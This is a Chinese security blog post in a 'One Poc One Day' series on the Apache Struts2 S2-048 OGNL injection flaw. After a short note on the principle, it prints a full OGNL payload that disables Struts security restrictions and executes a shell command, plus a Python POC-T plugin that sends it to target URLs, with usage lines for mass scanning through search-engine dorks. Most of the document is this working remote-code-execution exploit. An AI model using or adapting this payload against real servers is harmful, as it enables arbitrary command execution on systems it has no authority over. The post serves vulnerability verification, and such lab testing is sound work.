Test

izy

2018-08-13 2024-09-19 约 448 字预计阅读 2 分钟

目录

1 # 0x01

One Poc One Day.

2 # 0x02 原理

【原理详解】—— S2-048 动态分析

感觉说到底还是调用到的函数会执行ognl表达式，然后传入的参数用户可控。

3 # 0x03 Poc

3.1 ## Payload

json

%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dobby').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}

在vulhub的环境中进行poc验证的时候，只要在正常的请求后在添加一个重复参数包含payload即可。

不知道真实的环境中，有几个点还是有疑问的（需要真实环境验证）：

是否需要再重新设计一下payload的形式；

是否需要每次都必须指定参数，并插入payload，这样的话还能否自动化；还是每次都要指定参数进行poc验证；

python

#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Author: am4zing
# Date: 2018-08-10 15:36:34
# Project: https://github.com/yizhimanpadewoniu

"""
影响版本:
2.0.0 - 2.3.32

Usage:
python POC-T.py -s struts2-s2048 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2048 -aZ "login.action"
python POC-T.py -s struts2-s2048 -iF FILE.txt

使用过程中，与其他不同，此处需要指定参数，否则会报错？(这一点没摸准，可以再更新)
"""

import requests
import urllib


def poc(url):
    if 'http' not in url:
        url = 'http://' + url
    header = dict()
    header['Content-Type'] = 'application/x-www-form-urlencoded'
    header['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'
    payload = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dobby').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}'''
    try:
        payload = urllib.quote(payload)
        payload = '&name=' + payload
        post_data = raw_input('post_data:') + payload
        post_data = 'name=q&age=q&__checkbox_bustedBefore=true&description=q' + post_data
        result = requests.post(url, data=post_data, headers=header, timeout=5)
        if 'dobby' in result.content:
            return '[S2-048]' + url
        else:
            pass
    except Exception:
        return False

4 # 0x04 参考